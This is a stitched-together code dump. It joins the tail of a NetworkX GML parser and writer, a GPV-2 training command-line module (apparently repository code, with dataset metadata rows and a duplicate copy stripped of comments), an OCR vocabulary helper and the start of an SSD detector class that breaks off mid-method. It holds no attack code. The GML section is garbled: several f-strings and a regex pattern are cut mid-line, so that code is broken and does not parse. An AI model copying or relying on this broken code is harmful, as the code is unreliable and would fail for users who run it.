line = decode_line(line)
if line and line[-1] == "\n":
line = line[:-1]
if line.find("\n") != -1:
raise NetworkXError("input line contains newline")
yield line
G = parse_gml_lines(filter_lines(lines), label, destringizer)
return G
class Pattern(Enum):
KEYS = 0
REALS = 1
INTS = 2
STRINGS = 3
DICT_START = 4
DICT_END = 5
COMMENT_WHITESPACE = 6
class Token(NamedTuple):
category: Pattern
value: Any
line: int
position: int
LIST_START_VALUE = "_networkx_list_start"
def parse_gml_lines(lines, label, destringizer):
def tokenize():
patterns = [
r"[A-Za-z][0-9A-Za-z_]*\b", # keys
# reals
r"[+-]?(?:[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)(?:[Ee][+-]?[0-9]+)?",
r"[+-]?[0-9]+", # ints
r'".*?"', # strings
r"\[", # dict start
r"\]", # dict end
r"
]
tokens = re.compile("|".join(f"({pattern})" for pattern in patterns))
lineno = 0
for line in lines:
length = len(line)
pos = 0
while pos < length:
match = tokens.match(line, pos)
if match is None:
m = f"cannot tokenize {line[pos:]} at ({lineno + 1}, {pos + 1})"
raise NetworkXError(m)
for i in range(len(patterns)):
group = match.group(i + 1)
if group is not None:
if i == 0: # keys
value = group.rstrip()
elif i == 1: # reals
value = float(group)
elif i == 2: # ints
value = int(group)
else:
value = group
if i != 6: # comments and whitespaces
yield Token(Pattern(i), value, lineno + 1, pos + 1)
pos += len(group)
break
lineno += 1
yield Token(None, None, lineno + 1, 1) # EOF
def unexpected(curr_token, expected):
category, value, lineno, pos = curr_token
value = repr(value) if value is not None else "EOF"
raise NetworkXError(f"expected {expected}, found {value} at ({lineno}, {pos})")
def consume(curr_token, category, expected):
if curr_token.category == category:
return next(tokens)
unexpected(curr_token, expected)
def parse_kv(curr_token):
dct = defaultdict(list)
while curr_token.category == Pattern.KEYS:
key = curr_token.value
curr_token = next(tokens)
category = curr_token.category
if category == Pattern.REALS or category == Pattern.INTS:
value = curr_token.value
curr_token = next(tokens)
elif category == Pattern.STRINGS:
value = unescape(curr_token.value[1:-1])
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
elif category == Pattern.DICT_START:
curr_token, value = parse_dict(curr_token)
else:
# Allow for string convertible id and label values
if key in ("id", "label", "source", "target"):
try:
# String convert the token value
value = unescape(str(curr_token.value))
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
except Exception:
msg = (
"an int, float, string, '[' or string"
+ " convertable ASCII value for node id or label"
)
unexpected(curr_token, msg)
else: # Otherwise error out
unexpected(curr_token, "an int, float, string or '['")
dct[key].append(value)
def clean_dict_value(value):
if not isinstance(value, list):
return value
if len(value) == 1:
return value[0]
if value[0] == LIST_START_VALUE:
return value[1:]
return value
dct = {key: clean_dict_value(value) for key, value in dct.items()}
return curr_token, dct
def parse_dict(curr_token):
# dict start
curr_token = consume(curr_token, Pattern.DICT_START, "'['")
# dict contents
curr_token, dct = parse_kv(curr_token)
# dict end
curr_token = consume(curr_token, Pattern.DICT_END, "']'")
return curr_token, dct
def parse_graph():
curr_token, dct = parse_kv(next(tokens))
if curr_token.category is not None: # EOF
unexpected(curr_token, "EOF")
if "graph" not in dct:
raise NetworkXError("input contains no graph")
graph = dct["graph"]
if isinstance(graph, list):
raise NetworkXError("input contains more than one graph")
return graph
tokens = tokenize()
graph = parse_graph()
directed = graph.pop("directed", False)
multigraph = graph.pop("multigraph", False)
if not multigraph:
G = nx.DiGraph() if directed else nx.Graph()
else:
G = nx.MultiDiGraph() if directed else nx.MultiGraph()
graph_attr = {k: v for k, v in graph.items() if k not in ("node", "edge")}
G.graph.update(graph_attr)
def pop_attr(dct, category, attr, i):
try:
return dct.pop(attr)
except KeyError as e:
raise NetworkXError(f"{category}
nodes = graph.get("node", [])
mapping = {}
node_labels = set()
for i, node in enumerate(nodes if isinstance(nodes, list) else [nodes]):
id = pop_attr(node, "node", "id", i)
if id in G:
raise NetworkXError(f"node id {id!r} is duplicated")
if label is not None and label != "id":
node_label = pop_attr(node, "node", label, i)
if node_label in node_labels:
raise NetworkXError(f"node label {node_label!r} is duplicated")
node_labels.add(node_label)
mapping[id] = node_label
G.add_node(id, **node)
edges = graph.get("edge", [])
for i, edge in enumerate(edges if isinstance(edges, list) else [edges]):
source = pop_attr(edge, "edge", "source", i)
target = pop_attr(edge, "edge", "target", i)
if source not in G:
raise NetworkXError(f"edge
if target not in G:
raise NetworkXError(f"edge
if not multigraph:
if not G.has_edge(source, target):
G.add_edge(source, target, **edge)
else:
arrow = "->" if directed else "--"
msg = f"edge
raise nx.NetworkXError(msg)
else:
key = edge.pop("key", None)
if key is not None and G.has_edge(source, target, key):
arrow = "->" if directed else "--"
msg = f"edge
msg2 = 'Hint: If multigraph add "multigraph 1" to file header.'
raise nx.NetworkXError(msg + " is duplicated\n" + msg2)
G.add_edge(source, target, key, **edge)
if label is not None and label != "id":
G = nx.relabel_nodes(G, mapping)
return G
def literal_stringizer(value):
msg = "literal_stringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
def stringize(value):
if isinstance(value, (int, bool)) or value is None:
if value is True: # GML uses 1/0 for boolean values.
buf.write(str(1))
elif value is False:
buf.write(str(0))
else:
buf.write(str(value))
elif isinstance(value, str):
text = repr(value)
if text[0] != "u":
try:
value.encode("latin1")
except UnicodeEncodeError:
text = "u" + text
buf.write(text)
elif isinstance(value, (float, complex, str, bytes)):
buf.write(repr(value))
elif isinstance(value, list):
buf.write("[")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("]")
elif isinstance(value, tuple):
if len(value) > 1:
buf.write("(")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write(")")
elif value:
buf.write("(")
stringize(value[0])
buf.write(",)")
else:
buf.write("()")
elif isinstance(value, dict):
buf.write("{")
first = True
for key, value in value.items():
if not first:
buf.write(",")
else:
first = False
stringize(key)
buf.write(":")
stringize(value)
buf.write("}")
elif isinstance(value, set):
buf.write("{")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("}")
else:
msg = "{value!r} cannot be converted into a Python literal"
raise ValueError(msg)
buf = StringIO()
stringize(value)
return buf.getvalue()
def generate_gml(G, stringizer=None):
valid_keys = re.compile("^[A-Za-z][0-9A-Za-z_]*$")
def stringize(key, value, ignored_keys, indent, in_list=False):
if not isinstance(key, str):
raise NetworkXError(f"{key!r} is not a string")
if not valid_keys.match(key):
raise NetworkXError(f"{key!r} is not a valid key")
if not isinstance(key, str):
key = str(key)
if key not in ignored_keys:
if isinstance(value, (int, bool)):
if key == "label":
yield indent + key + ' "' + str(value) + '"'
elif value is True:
# python bool is an instance of int
yield indent + key + " 1"
elif value is False:
yield indent + key + " 0"
# GML only supports signed 32-bit integers
elif value < -2 ** 31 or value >= 2 ** 31:
yield indent + key + ' "' + str(value) + '"'
else:
yield indent + key + " " + str(value)
elif isinstance(value, float):
text = repr(value).upper()
# GML requires that a real literal contain a decimal point, but
# repr may not output a decimal point when the mantissa is
# integral and hence needs fixing.
epos = text.rfind("E")
if epos != -1 and text.find(".", 0, epos) == -1:
text = text[:epos] + "." + text[epos:]
if key == "label":
yield indent + key + ' "' + text + '"'
else:
yield indent + key + " " + text
elif isinstance(value, dict):
yield indent + key + " ["
next_indent = indent + " "
for key, value in value.items():
yield from stringize(key, value, (), next_indent)
yield indent + ']'
elif isinstance(value, (list, tuple)) and key != 'label' \
and value and not in_list:
if len(value) == 1:
yield indent + key + ' ' + f'"{LIST_START_VALUE}"'
for val in value:
yield from stringize(key, val, (), indent, True)
else:
if stringizer:
try:
value = stringizer(value)
except ValueError as e:
raise NetworkXError(
f"{value!r} cannot be converted into a string"
) from e
if not isinstance(value, str):
raise NetworkXError(f"{value!r} is not a string")
yield indent + key + ' "' + escape(value) + '"'
multigraph = G.is_multigraph()
yield "graph ["
# Output graph attributes
if G.is_directed():
yield " directed 1"
if multigraph:
yield " multigraph 1"
ignored_keys = {"directed", "multigraph", "node", "edge"}
for attr, value in G.graph.items():
yield from stringize(attr, value, ignored_keys, " ")
# Output node data
node_id = dict(zip(G, range(len(G))))
ignored_keys = {"id", "label"}
for node, attrs in G.nodes.items():
yield " node ["
yield " id " + str(node_id[node])
yield from stringize("label", node, (), " ")
for attr, value in attrs.items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
# Output edge data
ignored_keys = {"source", "target"}
kwargs = {"data": True}
if multigraph:
ignored_keys.add("key")
kwargs["keys"] = True
for e in G.edges(**kwargs):
yield " edge ["
yield " source " + str(node_id[e[0]])
yield " target " + str(node_id[e[1]])
if multigraph:
yield from stringize("key", e[2], (), " ")
for attr, value in e[-1].items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
yield "]"
@open_file(1, mode="wb")
def write_gml(G, path, stringizer=None):
for line in generate_gml(G, stringizer):
path.write((line + "\n").encode("ascii"))
| true
| true
|
1c3eab89ad9c859e5a79f47abfdc6eb5e5425323
| 8,200
|
py
|
Python
|
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | 13
|
2022-02-03T00:25:35.000Z
|
2022-03-20T02:36:05.000Z
|
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | null | null | null |
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | 3
|
2022-01-14T19:15:38.000Z
|
2022-02-11T14:12:52.000Z
|
import logging
from argparse import ArgumentParser
from gpv2.data.dataset import Task
from gpv2.data.gpv_datasets import GpvDataset, CocoCategories
from gpv2.model.model import BeamSearchSpec
from gpv2.train import evaluator
from gpv2.train.evaluator import ResultKey
from gpv2.train.runner import DataLoaderBuilder
from gpv2.train.trainer import Trainer, TrainerDataset, EvaluationSetup, RunArgs
from gpv2.utils.pytorch_utils import get_devices
def add_train_args(parser: ArgumentParser, batch_size=32, num_workers=6,
epochs=8, tasks="all", clip_grad_norm=None, find_unused_parameters=True):
"""Add a bunch of args to `parser` that are likely to be useful for multiple models
The extra args specify the defaults
"""
parser.add_argument("--task", nargs="+", default=tasks,
help="Tasks for train on")
parser.add_argument("--sce", action="store_true")
# Performance args
parser.add_argument("--device", nargs="+", default=None,
help="List of integer GPU devices to train on")
parser.add_argument("--dist_port", default=None, type=int,
help="Port to syn distributed training on")
parser.add_argument("--grad_accumulation", type=int, default=1,
help="Accumulate gradients over n step, the effective batch_size will "
"be unchanged")
parser.add_argument("--force_one_worker", action="store_true",
help="For debugging, run distributed code even only 1 device is given")
parser.add_argument("--nopin_memory", action="store_true",
help="Turn off memory pinning")
parser.add_argument("--num_workers", default=num_workers, type=int,
help="Number of workers to use")
parser.add_argument("--find_unused_parameters", action="store_true")
# Other training args
parser.add_argument("--clip_grad_norm", default=clip_grad_norm, type=float)
parser.add_argument("--batch_size", default=batch_size, type=int)
parser.add_argument("--epochs", default=epochs, type=int)
parser.add_argument("--debug", choices=["tiny", "small", "med", "large"], default=None)
# Output args
parser.add_argument("--eval_start", action="store_true")
parser.add_argument("--override", action="store_true")
parser.add_argument("--output_dir")
def run_train(args, model, **kwargs):
trainer = get_trainer_from_args(args, **kwargs)
run_trainer_from_args(trainer, model, args)
COCO_EVAL = {
Task.VQA: EvaluationSetup(
evaluator.VqaEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 10))
),
Task.CAPTIONING: EvaluationSetup(
evaluator.CaptionEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 30))
),
Task.LOCALIZATION: EvaluationSetup(
evaluator.LocalizationEvaluator(),
dict(beam_search_spec=None)
),
Task.CLS: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
Task.CLS_IN_CONTEXT: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
}
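# For example, COCO_EVAL[Task.CAPTIONING] pairs evaluator.CaptionEvaluator with
# BeamSearchSpec(1, 30), while the localization entry sets beam_search_spec=None.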
def get_trainer_from_args(
args, optimizer, logging_ema=0.99, sync_monitor=True, scheduler=None) -> Trainer:
batch_size, num_workers = args.batch_size, args.num_workers
if args.debug:
dbg_batch_size, dbg_num_workers = {
"tiny": (2, 0),
"small": (8, 0),
"med": (24, 4),
"large": (60, 4),
}[args.debug]
if not hasattr(args, "batch_size_not_default"):
batch_size = dbg_batch_size
if not hasattr(args, "num_workers_not_default"):
num_workers = dbg_num_workers
logging.info(f"batch size={batch_size}")
logging.info(f"num_workers={num_workers}")
logging.info(f"lr={args.lr}")
if args.grad_accumulation != 1:
logging.info(f"grad acc={args.grad_accumulation}")
train_datasets = []
eval_datasets = []
tasks = {} # Use a dictionary to preserve ordering with uniqueness
for dataset in args.task:
if dataset == "all":
tasks.update({x: None for x in Task})
elif dataset == "non-cls":
tasks.update({x: None for x in [Task.VQA, Task.CAPTIONING, Task.DETECTION]})
else:
tasks[Task(dataset)] = None
for task in tasks:
train_datasets.append(TrainerDataset(
GpvDataset(task, "train", args.sce), str(task) + "-tr", eval_setup=COCO_EVAL[task]))
eval_datasets.append(TrainerDataset(
GpvDataset(task, "val", args.sce), str(task) + "-val", eval_setup=COCO_EVAL[task]))
best_model_key = [
ResultKey("accuracy", dataset_name="cls-val"),
ResultKey("accuracy", dataset_name="cic-val"),
ResultKey("score", dataset_name="vqa-val"),
ResultKey("cider", dataset_name="cap-val"),
ResultKey("AP", dataset_name="det-val"),
ResultKey("accuracy", dataset_name="webqa-val"),
]
best_model_key = [x for x in best_model_key if any(x.dataset_name.startswith(str(t)) for t in tasks)]
if args.debug == "tiny":
for x in train_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 0
for x in eval_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 4
elif args.debug == "small":
for x in train_datasets:
x.dataset.sample = 120
x.eval_sample = 30
for x in eval_datasets:
x.dataset.sample = 120
x.eval_sample = 30
elif args.debug == "med":
for x in train_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
for x in eval_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
elif args.debug == "large":
for x in train_datasets:
x.dataset.sample = 10000
x.eval_sample = 2000
for x in eval_datasets:
x.eval_sample = 2000
else:
for x in train_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 5000
else:
x.eval_sample = 8000
for x in eval_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 8000
else:
x.eval_sample = 12000
train_loader = DataLoaderBuilder(batch_size, num_workers, not args.nopin_memory,
prefetch_factor=2, persist_workers=num_workers > 0)
# other_log specifies additional tensorboard logging outputs; we use it to
# add a second tab with results grouped by train/eval rather than by dataset
other_log = {}
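# Illustration: a validation captioning dataset named e.g. "cap-val" is logged
# both under its own name and under "val-evals/cider" (the dataset name here is
# hypothetical; the actual names come from the TrainerDataset objects above).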
evals = [(x, True) for x in train_datasets] + [(x, False) for x in eval_datasets]
for ds, is_train in evals:
task = ds.dataset.task
if task == Task.CAPTIONING:
metric_name, name = "cider", "cider"
k = evaluator.ResultKey(metric_name="bleu4", dataset_name=ds.get_name())
other_log[k] = "bleu4"
elif task == Task.CLS:
metric_name, name = "accuracy", "cls"
elif task == Task.VQA:
metric_name, name = "score", "vqa"
elif task == Task.LOCALIZATION:
metric_name, name = "AP", "loc"
elif task == Task.CLS_IN_CONTEXT:
metric_name, name = "accuracy", "ident"
elif task == Task.WEBQA:
metric_name, name = "accuracy", "webqa"
elif task == Task.HOI:
continue
else:
raise NotImplementedError(task)
name = f"train-evals/{name}" if is_train else f"val-evals/{name}"
other_log[evaluator.ResultKey(metric_name=metric_name, dataset_name=ds.get_name())] = name
trainer = Trainer(
train_datasets,
eval_datasets,
optimizer,
train_loader=train_loader,
step_schedule=scheduler,
save_evaluation_results=True,
save_prediction_samples=500,
train_val_log=list(other_log.items()),
find_unused_parameters=not args.find_unused_parameters,
epochs=args.epochs,
best_model_key=best_model_key,
clip_grad_norm=args.clip_grad_norm,
tb_log_intervals=20,
checkpoint=True,
sync_monitor=sync_monitor,
eval_at_start=args.eval_start,
loss_logging_ema=logging_ema,
monitor_ema=logging_ema,
)
return trainer
def run_trainer_from_args(trainer, model, args):
devices = RunArgs.build(get_devices(args.device), args.force_one_worker, args.grad_accumulation)
trainer.train(model, args.output_dir, devices, override=args.override)
| 34.745763
| 103
| 0.682195
|
import logging
from argparse import ArgumentParser
from gpv2.data.dataset import Task
from gpv2.data.gpv_datasets import GpvDataset, CocoCategories
from gpv2.model.model import BeamSearchSpec
from gpv2.train import evaluator
from gpv2.train.evaluator import ResultKey
from gpv2.train.runner import DataLoaderBuilder
from gpv2.train.trainer import Trainer, TrainerDataset, EvaluationSetup, RunArgs
from gpv2.utils.pytorch_utils import get_devices
def add_train_args(parser: ArgumentParser, batch_size=32, num_workers=6,
epochs=8, tasks="all", clip_grad_norm=None, find_unused_parameters=True):
parser.add_argument("--task", nargs="+", default=tasks,
help="Tasks for train on")
parser.add_argument("--sce", action="store_true")
parser.add_argument("--device", nargs="+", default=None,
help="List of integer GPU devices to train on")
parser.add_argument("--dist_port", default=None, type=int,
help="Port to syn distributed training on")
parser.add_argument("--grad_accumulation", type=int, default=1,
help="Accumulate gradients over n step, the effective batch_size will "
"be unchanged")
parser.add_argument("--force_one_worker", action="store_true",
help="For debugging, run distributed code even only 1 device is given")
parser.add_argument("--nopin_memory", action="store_true",
help="Turn off memory pinning")
parser.add_argument("--num_workers", default=num_workers, type=int,
help="Number of workers to use")
parser.add_argument("--find_unused_parameters", action="store_true")
parser.add_argument("--clip_grad_norm", default=clip_grad_norm, type=float)
parser.add_argument("--batch_size", default=batch_size, type=int)
parser.add_argument("--epochs", default=epochs, type=int)
parser.add_argument("--debug", choices=["tiny", "small", "med", "large"], default=None)
parser.add_argument("--eval_start", action="store_true")
parser.add_argument("--override", action="store_true")
parser.add_argument("--output_dir")
def run_train(args, model, **kwargs):
trainer = get_trainer_from_args(args, **kwargs)
run_trainer_from_args(trainer, model, args)
COCO_EVAL = {
Task.VQA: EvaluationSetup(
evaluator.VqaEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 10))
),
Task.CAPTIONING: EvaluationSetup(
evaluator.CaptionEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 30))
),
Task.LOCALIZATION: EvaluationSetup(
evaluator.LocalizationEvaluator(),
dict(beam_search_spec=None)
),
Task.CLS: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
Task.CLS_IN_CONTEXT: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
}
def get_trainer_from_args(
args, optimizer, logging_ema=0.99, sync_monitor=True, scheduler=None) -> Trainer:
batch_size, num_workers = args.batch_size, args.num_workers
if args.debug:
dbg_batch_size, dbg_num_workers = {
"tiny": (2, 0),
"small": (8, 0),
"med": (24, 4),
"large": (60, 4),
}[args.debug]
if not hasattr(args, "batch_size_not_default"):
batch_size = dbg_batch_size
if not hasattr(args, "num_workers_not_default"):
num_workers = dbg_num_workers
logging.info(f"batch size={batch_size}")
logging.info(f"num_workers={num_workers}")
logging.info(f"lr={args.lr}")
if args.grad_accumulation != 1:
logging.info(f"grad acc={args.grad_accumulation}")
train_datasets = []
eval_datasets = []
tasks = {}
for dataset in args.task:
if dataset == "all":
tasks.update({x: None for x in Task})
elif dataset == "non-cls":
tasks.update({x: None for x in [Task.VQA, Task.CAPTIONING, Task.DETECTION]})
else:
tasks[Task(dataset)] = None
for task in tasks:
train_datasets.append(TrainerDataset(
GpvDataset(task, "train", args.sce), str(task) + "-tr", eval_setup=COCO_EVAL[task]))
eval_datasets.append(TrainerDataset(
GpvDataset(task, "val", args.sce), str(task) + "-val", eval_setup=COCO_EVAL[task]))
best_model_key = [
ResultKey("accuracy", dataset_name="cls-val"),
ResultKey("accuracy", dataset_name="cic-val"),
ResultKey("score", dataset_name="vqa-val"),
ResultKey("cider", dataset_name="cap-val"),
ResultKey("AP", dataset_name="det-val"),
ResultKey("accuracy", dataset_name="webqa-val"),
]
best_model_key = [x for x in best_model_key if any(x.dataset_name.startswith(str(t)) for t in tasks)]
if args.debug == "tiny":
for x in train_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 0
for x in eval_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 4
elif args.debug == "small":
for x in train_datasets:
x.dataset.sample = 120
x.eval_sample = 30
for x in eval_datasets:
x.dataset.sample = 120
x.eval_sample = 30
elif args.debug == "med":
for x in train_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
for x in eval_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
elif args.debug == "large":
for x in train_datasets:
x.dataset.sample = 10000
x.eval_sample = 2000
for x in eval_datasets:
x.eval_sample = 2000
else:
for x in train_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 5000
else:
x.eval_sample = 8000
for x in eval_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 8000
else:
x.eval_sample = 12000
train_loader = DataLoaderBuilder(batch_size, num_workers, not args.nopin_memory,
prefetch_factor=2, persist_workers=num_workers > 0)
other_log = {}
evals = [(x, True) for x in train_datasets] + [(x, False) for x in eval_datasets]
for ds, is_train in evals:
task = ds.dataset.task
if task == Task.CAPTIONING:
metric_name, name = "cider", "cider"
k = evaluator.ResultKey(metric_name="bleu4", dataset_name=ds.get_name())
other_log[k] = "bleu4"
elif task == Task.CLS:
metric_name, name = "accuracy", "cls"
elif task == Task.VQA:
metric_name, name = "score", "vqa"
elif task == Task.LOCALIZATION:
metric_name, name = "AP", "loc"
elif task == Task.CLS_IN_CONTEXT:
metric_name, name = "accuracy", "ident"
elif task == Task.WEBQA:
metric_name, name = "accuracy", "webqa"
elif task == Task.HOI:
continue
else:
raise NotImplementedError(task)
name = f"train-evals/{name}" if is_train else f"val-evals/{name}"
other_log[evaluator.ResultKey(metric_name=metric_name, dataset_name=ds.get_name())] = name
trainer = Trainer(
train_datasets,
eval_datasets,
optimizer,
train_loader=train_loader,
step_schedule=scheduler,
save_evaluation_results=True,
save_prediction_samples=500,
train_val_log=list(other_log.items()),
find_unused_parameters=not args.find_unused_parameters,
epochs=args.epochs,
best_model_key=best_model_key,
clip_grad_norm=args.clip_grad_norm,
tb_log_intervals=20,
checkpoint=True,
sync_monitor=sync_monitor,
eval_at_start=args.eval_start,
loss_logging_ema=logging_ema,
monitor_ema=logging_ema,
)
return trainer
def run_trainer_from_args(trainer, model, args):
devices = RunArgs.build(get_devices(args.device), args.force_one_worker, args.grad_accumulation)
trainer.train(model, args.output_dir, devices, override=args.override)
| true
| true
|
1c3eac835ba7397893099136aa6bcebacad7b24a
| 1,911
|
py
|
Python
|
Source/utils/labelmaps.py
|
YacobBY/ICDAR2019-ArT-Recognition-Alchemy
|
911c572c2aff4599a74b7974d46ef4cfb17078b9
|
[
"MIT"
] | 209
|
2019-08-28T10:42:54.000Z
|
2022-01-10T13:49:32.000Z
|
Source/utils/labelmaps.py
|
wangxiong101/ICDAR2019-ArT-Recognition-Alchemy
|
5b03f73386f0a45ecc498f653d96012caa4a0c76
|
[
"MIT"
] | 16
|
2019-09-01T05:12:39.000Z
|
2021-03-28T04:00:24.000Z
|
Source/utils/labelmaps.py
|
wangxiong101/ICDAR2019-ArT-Recognition-Alchemy
|
5b03f73386f0a45ecc498f653d96012caa4a0c76
|
[
"MIT"
] | 76
|
2019-09-02T03:11:09.000Z
|
2021-11-11T04:42:31.000Z
|
from __future__ import absolute_import
import string
from . import to_torch, to_numpy
def get_vocabulary(voc_type, EOS='EOS', PADDING='PADDING', UNKNOWN='UNKNOWN'):
'''
voc_type: str: one of 'LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS'
'''
voc = None
types = ['LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS']
if voc_type == 'LOWERCASE':
voc = list(string.digits + string.ascii_lowercase)
elif voc_type == 'ALLCASES':
voc = list(string.digits + string.ascii_letters)
elif voc_type == 'ALLCASES_SYMBOLS':
voc = list(string.printable[:-6])
elif voc_type == 'LOWERCASE_SYMBOLS':
voc = list(string.digits + string.ascii_lowercase +
string.printable[-38:-6])
else:
raise KeyError(
'voc_type must be one of "LOWERCASE", "ALLCASES", "ALLCASES_SYMBOLS", "LOWERCASE_SYMBOLS"')
# update the voc with specifical chars
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
# special characters for IC19 competition
# special = '∑,ºóʃüεäèиíöλá:®é·#' # high frequency in the public training set
# voc.extend(list(special))
return voc
# param voc: the list of vocabulary
def char2id(voc):
return dict(zip(voc, range(len(voc))))
def id2char(voc):
return dict(zip(range(len(voc)), voc))
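# A small usage sketch, not part of the original file; the chosen voc_type is
# only an example.
def _example_vocabulary_usage():
    voc = get_vocabulary('LOWERCASE')  # digits + lowercase letters + EOS/PADDING/UNKNOWN
    c2i, i2c = char2id(voc), id2char(voc)
    return i2c[c2i['a']]  # round-trips back to 'a'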
def labels2strs(labels, id2char, char2id):
# labels: batch_size x len_seq
assert labels.dim() == 2
labels = to_numpy(labels)
strings = []
batch_size = labels.shape[0]
for i in range(batch_size):
label = labels[i]
string = []
for l in label:
if l == char2id['EOS']:
break
else:
string.append(id2char[l])
string = ''.join(string)
strings.append(string)
return strings
| 28.102941
| 91
| 0.600733
|
from __future__ import absolute_import
import string
from . import to_torch, to_numpy
def get_vocabulary(voc_type, EOS='EOS', PADDING='PADDING', UNKNOWN='UNKNOWN'):
voc = None
types = ['LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS']
if voc_type == 'LOWERCASE':
voc = list(string.digits + string.ascii_lowercase)
elif voc_type == 'ALLCASES':
voc = list(string.digits + string.ascii_letters)
elif voc_type == 'ALLCASES_SYMBOLS':
voc = list(string.printable[:-6])
elif voc_type == 'LOWERCASE_SYMBOLS':
voc = list(string.digits + string.ascii_lowercase +
string.printable[-38:-6])
else:
raise KeyError(
'voc_type must be one of "LOWERCASE", "ALLCASES", "ALLCASES_SYMBOLS", "LOWERCASE_SYMBOLS"')
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
return voc
def char2id(voc):
return dict(zip(voc, range(len(voc))))
def id2char(voc):
return dict(zip(range(len(voc)), voc))
def labels2strs(labels, id2char, char2id):
assert labels.dim() == 2
labels = to_numpy(labels)
strings = []
batch_size = labels.shape[0]
for i in range(batch_size):
label = labels[i]
string = []
for l in label:
if l == char2id['EOS']:
break
else:
string.append(id2char[l])
string = ''.join(string)
strings.append(string)
return strings
| true
| true
|
1c3ead84bd5d5e28185269b23e0aa67b71bef3ff
| 7,632
|
py
|
Python
|
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from layers import *
from data import voc, coco
import os
class SSD(nn.Module):
"""Single Shot Multibox Architecture
The network is composed of a base VGG network followed by the
added multibox conv layers. Each multibox layer branches into
1) conv2d for class conf scores
2) conv2d for localization predictions
3) associated priorbox layer to produce default bounding
boxes specific to the layer's feature map size.
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
Args:
phase: (string) Can be "test" or "train"
size: input image size
base: VGG16 layers for input, size of either 300 or 512
extras: extra layers that feed to multibox loc and conf layers
head: "multibox head" consists of loc and conf conv layers
"""
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = (coco, voc)[num_classes == 21]
self.priorbox = PriorBox(self.cfg)
self.priors = self.priorbox.forward()
self.size = size
# SSD network
self.vgg = nn.ModuleList(base)
# Layer learns to scale the l2 normalized features from conv4_3
self.L2Norm = L2Norm(512, 20)
self.extras = nn.ModuleList(extras)
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
def forward(self, x):
"""Applies network layers and ops on input image(s) x.
Args:
x: input image or batch of images. Shape: [batch,3,300,300].
Return:
Depending on phase:
test:
tensor of output class label predictions,
confidence score, and corresponding location predictions for
each object detected. Shape: [batch,topk,7]
train:
list of concat outputs from:
1: confidence layers, Shape: [batch*num_priors,num_classes]
2: localization layers, Shape: [batch,num_priors*4]
3: priorbox layers, Shape: [2,num_priors*4]
"""
sources = list()
loc = list()
conf = list()
# apply vgg up to conv4_3 relu
for k in range(23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
# apply vgg up to fc7
for k in range(23, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
# apply extra layers and cache source layer outputs
for k, v in enumerate(self.extras):
x = F.relu(v(x), inplace=True)
if k % 2 == 1:
sources.append(x)
# apply multibox head to source layers
for (x, l, c) in zip(sources, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
